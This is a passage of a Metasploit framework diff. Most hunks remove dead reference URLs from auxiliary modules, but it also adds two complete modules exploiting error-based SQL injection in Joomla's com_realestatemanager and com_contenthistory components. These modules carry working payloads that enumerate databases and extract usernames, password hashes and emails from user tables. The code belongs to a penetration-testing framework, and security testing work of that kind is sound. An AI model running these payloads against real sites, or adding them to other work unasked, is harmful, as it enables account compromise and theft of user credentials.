['URL', 'https://kb.isc.org/article/AA-01272'],
|
||||
['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
|
||||
['URL', 'https://kb.isc.org/article/AA-01272']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 28 2015',
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ],
|
||||
[ 'BID', '16838' ],
|
||||
[ 'OSVDB', '23511' ],
|
||||
[ 'CVE', '2006-0900' ],
|
||||
|
|
|
@ -30,7 +30,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2014-0050'],
|
||||
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
|
||||
['URL', 'http://tomcat.apache.org/security-8.html'],
|
||||
['URL', 'http://tomcat.apache.org/security-7.html']
|
||||
],
|
||||
|
|
|
@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CVE', '2013-3843'],
|
||||
['OSVDB', '93853'],
|
||||
['BID', '60333'],
|
||||
['URL', 'http://bugs.monkey-project.com/ticket/182']
|
||||
['BID', '60333']
|
||||
],
|
||||
'DisclosureDate' => 'May 30 2013'))
|
||||
|
||||
|
|
|
@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2005-4797' ],
|
||||
[ 'BID', '14510' ],
|
||||
[ 'OSVDB', '18650' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
|
||||
[ 'OSVDB', '18650' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-2686'],
|
||||
[ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt']
|
||||
[ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 05 2013'))
|
||||
|
||||
|
|
|
@ -19,10 +19,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => ["Sil3nt_Dre4m"],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ]
|
||||
],
|
||||
'DisclosureDate' => 'Jul 2 2011'))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '50617' ],
|
||||
[ 'BID', '5817' ],
|
||||
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
|
||||
[ 'BID', '5817' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
|
||||
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
|
||||
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html']
|
||||
]))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2014-6039' ],
|
||||
[ 'OSVDB', '114342' ],
|
||||
[ 'OSVDB', '114344' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 5 2014'))
|
||||
|
|
|
@ -70,8 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['CWE', '425'],
|
||||
['CVE', '2013-6031'],
|
||||
['US-CERT-VU', '341526'],
|
||||
['URL', 'http://www.huaweidevice.co.in/Support/Downloads/'],
|
||||
['US-CERT-VU', '341526']
|
||||
],
|
||||
'DisclosureDate' => "Nov 11 2013" ))
|
||||
|
||||
|
|
|
@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2015-0072' ],
|
||||
[ 'OSVDB', '117876' ],
|
||||
[ 'MSB', 'MS15-018' ],
|
||||
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
|
||||
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
|
||||
],
|
||||
|
|
|
@ -0,0 +1,260 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability in Joomla Plugin
|
||||
com_realestatemanager versions 3.7 in order to either enumerate
|
||||
usernames and password hashes.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '38445']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Omer Ramic', # discovery
|
||||
'Nixawk', # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Oct 22 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def print_good(message='')
|
||||
super("#{rhost}:#{rport} - #{message}")
|
||||
end
|
||||
|
||||
def print_status(message='')
|
||||
super("#{rhost}:#{rport} - #{message}")
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: opts[:ip],
|
||||
port: opts[:port],
|
||||
service_name: ssl ? 'https' : 'http',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: fullname,
|
||||
username: opts[:user]
|
||||
}.merge(service_data)
|
||||
|
||||
if opts[:password]
|
||||
credential_data.merge!(
|
||||
private_data: opts[:password],
|
||||
private_type: :nonreplayable_hash,
|
||||
jtr_format: 'md5'
|
||||
)
|
||||
end
|
||||
|
||||
login_data = {
|
||||
core: create_credential(credential_data),
|
||||
status: opts[:status],
|
||||
proof: opts[:proof]
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def check
|
||||
flag = Rex::Text.rand_text_alpha(5)
|
||||
payload = "0x#{flag.unpack('H*')[0]}"
|
||||
|
||||
data = sqli(payload)
|
||||
if data && data.include?(flag)
|
||||
Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def sqli(query)
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = '(SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << '%s,'
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
get = {
|
||||
'option' => 'com_realestatemanager',
|
||||
'task' => 'showCategory',
|
||||
'catid' => '50',
|
||||
'Itemid' => '132'
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'vars_get' => get,
|
||||
})
|
||||
|
||||
|
||||
if res && res.code == 200
|
||||
cookie = res.get_cookies
|
||||
post = {
|
||||
'order_field' => 'price',
|
||||
'order_direction' => 'asc,' + (payload % query)
|
||||
}
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie,
|
||||
'vars_get' => get,
|
||||
'vars_post' => post
|
||||
})
|
||||
|
||||
# Error based SQL Injection
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
|
||||
$1
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def query_databases
|
||||
dbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
|
||||
|
||||
dbc = sqli(query)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
|
||||
|
||||
0.upto(dbc.to_i - 1) do |i|
|
||||
dbname = sqli(query_fmt % i)
|
||||
dbs << dbname
|
||||
vprint_good("Found database name: #{dbname}")
|
||||
end
|
||||
|
||||
%w(performance_schema information_schema mysql).each do |dbname|
|
||||
dbs.delete(dbname) if dbs.include?(dbname)
|
||||
end
|
||||
dbs
|
||||
end
|
||||
|
||||
def query_tables(database)
|
||||
tbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
|
||||
|
||||
tbc = sqli(query)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
|
||||
query_fmt << 'LIMIT %d,1)'
|
||||
|
||||
vprint_status('tables in database: %s' % database)
|
||||
0.upto(tbc.to_i - 1) do |i|
|
||||
tbname = sqli(query_fmt % i)
|
||||
vprint_good("Found table #{database}.#{tbname}")
|
||||
tbs << tbname if tbname =~ /_users$/
|
||||
end
|
||||
tbs
|
||||
end
|
||||
|
||||
def query_columns(database, table)
|
||||
cols = []
|
||||
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
|
||||
|
||||
colc = sqli(query)
|
||||
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
|
||||
|
||||
valid_cols = [ # joomla_users
|
||||
'activation',
|
||||
'block',
|
||||
'email',
|
||||
'id',
|
||||
'lastResetTime',
|
||||
'lastvisitDate',
|
||||
'name',
|
||||
'otep',
|
||||
'otpKey',
|
||||
'params',
|
||||
'password',
|
||||
'registerDate',
|
||||
'requireReset',
|
||||
'resetCount',
|
||||
'sendEmail',
|
||||
'username'
|
||||
]
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
|
||||
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
|
||||
|
||||
0.upto(colc.to_i - 1) do |i|
|
||||
record = {}
|
||||
valid_cols.each do |col|
|
||||
l = 1
|
||||
record[col] = ''
|
||||
loop do
|
||||
value = sqli(query_fmt % [col, l, i])
|
||||
break if value.blank?
|
||||
record[col] << value
|
||||
l += 54
|
||||
end
|
||||
end
|
||||
cols << record
|
||||
|
||||
unless record['username'].blank?
|
||||
print_good("Found credential: #{record['username']}:#{record['password']} (Email: #{record['email']})")
|
||||
report_cred(
|
||||
ip: rhost,
|
||||
port: datastore['RPORT'],
|
||||
user: record['username'].to_s,
|
||||
password: record['password'].to_s,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
proof: record.to_s
|
||||
)
|
||||
end
|
||||
|
||||
vprint_status(record.to_s)
|
||||
end
|
||||
cols
|
||||
end
|
||||
|
||||
def run
|
||||
dbs = query_databases
|
||||
dbs.each do |db|
|
||||
tables = query_tables(db)
|
||||
tables.each do |table|
|
||||
cols = query_columns(db, table)
|
||||
next if cols.blank?
|
||||
path = store_loot(
|
||||
'joomla.users',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
cols.to_json,
|
||||
'joomla.users')
|
||||
print_good('Saved file to: ' + path)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,210 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability in Joomla versions 3.2
|
||||
through 3.4.4 in order to either enumerate usernames and password hashes.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-7297'],
|
||||
['URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Asaf Orpani', # discovery
|
||||
'bperry', # metasploit module
|
||||
'Nixawk' # module review
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Oct 22 2015'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
flag = Rex::Text.rand_text_alpha(8)
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
res = sqli(payload)
|
||||
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
|
||||
Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def request(query, payload, lmark, rmark)
|
||||
query = "#{payload}" % query
|
||||
res = sqli(query)
|
||||
|
||||
# Error based SQL Injection
|
||||
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
|
||||
$1
|
||||
end
|
||||
end
|
||||
|
||||
def query_databases(payload, lmark, rmark)
|
||||
dbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
|
||||
|
||||
dbc = request(query, payload, lmark, rmark)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
|
||||
|
||||
0.upto(dbc.to_i - 1) do |i|
|
||||
dbname = request(query_fmt % i, payload, lmark, rmark)
|
||||
dbs << dbname
|
||||
vprint_good(dbname)
|
||||
end
|
||||
|
||||
%w(performance_schema information_schema mysql).each do |dbname|
|
||||
dbs.delete(dbname) if dbs.include?(dbname)
|
||||
end
|
||||
|
||||
dbs
|
||||
end
|
||||
|
||||
def query_tables(database, payload, lmark, rmark)
|
||||
tbs = []
|
||||
|
||||
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
|
||||
query << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
|
||||
|
||||
tbc = request(query, payload, lmark, rmark)
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
|
||||
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
|
||||
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
|
||||
query_fmt << 'LIMIT %d,1)'
|
||||
|
||||
vprint_status('tables in database: %s' % database)
|
||||
0.upto(tbc.to_i - 1) do |i|
|
||||
tbname = request(query_fmt % i, payload, lmark, rmark)
|
||||
vprint_good(tbname)
|
||||
tbs << tbname if tbname =~ /_users$/
|
||||
end
|
||||
|
||||
tbs
|
||||
end
|
||||
|
||||
def query_columns(database, table, payload, lmark, rmark)
|
||||
cols = []
|
||||
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
|
||||
|
||||
colc = request(query, payload, lmark, rmark)
|
||||
vprint_status(colc)
|
||||
|
||||
valid_cols = [ # joomla_users
|
||||
'activation',
|
||||
'block',
|
||||
'email',
|
||||
'id',
|
||||
'lastResetTime',
|
||||
'lastvisitDate',
|
||||
'name',
|
||||
'otep',
|
||||
'otpKey',
|
||||
'params',
|
||||
'password',
|
||||
'registerDate',
|
||||
'requireReset',
|
||||
'resetCount',
|
||||
'sendEmail',
|
||||
'username'
|
||||
]
|
||||
|
||||
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
|
||||
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
|
||||
|
||||
0.upto(colc.to_i - 1) do |i|
|
||||
record = {}
|
||||
valid_cols.each do |col|
|
||||
l = 1
|
||||
record[col] = ''
|
||||
loop do
|
||||
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
|
||||
break if value.blank?
|
||||
record[col] << value
|
||||
l += 54
|
||||
end
|
||||
end
|
||||
cols << record
|
||||
vprint_status(record.to_s)
|
||||
end
|
||||
|
||||
cols
|
||||
end
|
||||
|
||||
def run
|
||||
lmark = Rex::Text.rand_text_alpha(5)
|
||||
rmark = Rex::Text.rand_text_alpha(5)
|
||||
|
||||
payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
|
||||
payload << "0x#{lmark.unpack('H*')[0]},"
|
||||
payload << '%s,'
|
||||
payload << "0x#{rmark.unpack('H*')[0]},"
|
||||
payload << 'FLOOR(RAND(0)*2)'
|
||||
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
|
||||
|
||||
dbs = query_databases(payload, lmark, rmark)
|
||||
dbs.each do |db|
|
||||
tables = query_tables(db, payload, lmark, rmark)
|
||||
tables.each do |table|
|
||||
cols = query_columns(db, table, payload, lmark, rmark)
|
||||
next if cols.blank?
|
||||
path = store_loot(
|
||||
'joomla.users',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
cols.to_json,
|
||||
'joomla.users')
|
||||
print_good('Saved file to: ' + path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def sqli(payload)
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'vars_get' => {
|
||||
'option' => 'com_contenthistory',
|
||||
'view' => 'history',
|
||||
'list[ordering]' => '',
|
||||
'item_id' => 1,
|
||||
'type_id' => 1,
|
||||
'list[select]' => '1 ' + payload
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
end
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2014-4872' ],
|
||||
[ 'OSVDB', '112741' ],
|
||||
[ 'US-CERT-VU', '121036' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 7 2014'
|
||||
|
|
|
@ -35,8 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
|
||||
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
|
||||
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
|
||||
[ 'URL', 'http://tools.ietf.org/html/rfc864' ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 08 1996')
|
||||
|
||||
|
|
|
@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Call Scanner',
|
||||
'Description' => 'This module scans for active DECT calls',
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
end
|
||||
|
||||
|
|
|
@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'DECT Base Station Scanner',
|
||||
'Description' => 'This module scans for DECT base stations',
|
||||
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.dedected.org'] ]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
end
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '2936'],
|
||||
[ 'CVE', '2001-0537'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml'],
|
||||
[ 'OSVDB', '578' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 27 2001'))
|
||||
|
|
|
@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3305' ],
|
||||
[ 'OSVDB', '76080'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ]
|
||||
[ 'OSVDB', '76080']
|
||||
],
|
||||
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
|
|
|
@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2861' ],
|
||||
[ 'BID', '42342' ],
|
||||
[ 'OSVDB', '67047' ],
|
||||
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
|
||||
[ 'URL', 'http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
|
||||
]
|
||||
|
|
|
@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['OSVDB', '70762'],
|
||||
['CVE', '2011-0049'],
|
||||
['CVE', '2011-0063'],
|
||||
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
|
||||
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
|
||||
['EDB', '16103']
|
||||
],
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80262'],
|
||||
[ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ]
|
||||
[ 'OSVDB', '80262']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '86881' ],
|
||||
[ 'BID', '57969' ],
|
||||
[ 'EDB', '24504' ],
|
||||
[ 'URL', 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-011' ]
|
||||
],
|
||||
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
|
||||
|
|
|
@ -18,10 +18,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
|
||||
],
|
||||
'Author' => ['SeawolfRN'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
|
|
@ -23,10 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
The protocol deisgn issue also allows attackers to reset passwords on the device.
|
||||
},
|
||||
'Author' => 'Ben Schmidt',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
|
|
@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2012-2215' ],
|
||||
[ 'OSVDB', '80230' ],
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ],
|
||||
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html' ]
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -18,11 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
must match the rogue_send parameters used exactly.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
system is using as its default route.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -37,7 +37,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' => [
|
||||
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ],
|
||||
[ 'URL', 'http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm'],
|
||||
[ 'URL', 'http://www.onapsis.com/research-free-solutions.php' ], # Bizsploit Opensource ERP Pentesting Framework
|
||||
[ 'URL', 'http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf' ]
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -121,6 +121,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
framework_module: self,
|
||||
)
|
||||
|
||||
scanner.verbosity = :debug if datastore['SSH_DEBUG']
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
|
|
|
@ -214,6 +214,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
framework_module: self,
|
||||
)
|
||||
|
||||
scanner.verbosity = :debug if datastore['SSH_DEBUG']
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
|
|
|
@ -22,10 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Simply address any of the TODOs.
|
||||
),
|
||||
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://example.com/~jcontributor']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 15 2014',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
|
|
@ -47,7 +47,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' => [
|
||||
['CVE', '2015-1793'],
|
||||
['CWE', '754'],
|
||||
['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
|
||||
['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 9 2015'
|
||||
|
|
|
@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3996' ],
|
||||
[ 'OSVDB', '49321'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'],
|
||||
[ 'OSVDB', '49321']
|
||||
],
|
||||
